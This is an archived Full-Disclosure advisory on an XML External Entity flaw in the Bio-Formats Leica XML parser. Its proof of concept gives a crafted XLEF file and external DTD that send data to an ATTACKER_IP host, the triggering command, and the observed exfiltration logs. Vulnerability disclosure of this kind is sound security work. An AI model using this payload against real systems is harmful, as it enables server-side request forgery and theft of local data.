| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-Gzm5zuCmCcKaDmNHdzHe_yRt_ikUKiwVVvJirWFG3g7sA@mail.gmail.com>
Date: Mon, 29 Dec 2025 22:56:29 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Bioformats v8.3.0 Improper Restriction of XML External Entity
Reference in Bio-Formats Leica Microsystems XML Parser
Bio-Formats contains an XML External Entity (XXE) vulnerability in the
Leica Microsystems metadata parsing component. The vulnerability is caused
by the use of an insecurely configured DocumentBuilderFactory when
processing Leica XML-based metadata files (e.g., XLEF). When a crafted XML
file is supplied, the parser allows external entity resolution and external
DTD loading, enabling attackers to trigger arbitrary outbound network
requests, access local system resources, or cause a denial-of-service
condition during XML parsing.
*Impact:*
An attacker who can supply a crafted Leica XML metadata file may:
* Trigger XML External Entity (XXE) injection
* Perform server-side request forgery (SSRF) via outbound HTTP requests
* Access local files where XML-safe content exists
* Cause denial of service through entity expansion or parser instability
* Exfiltrate data through blind out-of-band channels
Exploitation occurs during XML parsing and does not require authentication.
*Proof of Concept:*
Malicious XLEF File
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY % ext SYSTEM "http://ATTACKER_IP:8000/evil.dtd">
%ext;
]>
<xlef>
<Image>&exfil;</Image>
</xlef>
Attacker-Controlled External DTD (evil.dtd)
<!ENTITY exfil SYSTEM "http://ATTACKER_IP:8000/exfil?data=ubuntu">
*Exploit Execution:*
java -cp bioformats_package.jar \
loci.formats.tools.ImageInfo xxe_blind.xlef
*Observed Exploit Output:*
Victim Application Output
Initializing reader
XLEFReader initializing xxe_blind.xlef
http://ATTACKER_IP:8000/exfil?data=ubuntu
java.io.FileNotFoundException: http://ATTACKER_IP:8000/exfil?data=ubuntu
at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity
at org.apache.xerces.impl.XMLEntityManager.startEntity
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset
at javax.xml.parsers.DocumentBuilder.parse
at LMSXmlDocument.initFromFilepath(LMSXmlDocument.java:125)
Attacker HTTP Server Log
192.x.x.x - - [23/Dec/2025 23:28:19]
"GET /exfil?data=ubuntu HTTP/1.1" 404 -
The outbound HTTP request confirms that the XML parser resolved
attacker-controlled external entities during file parsing.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists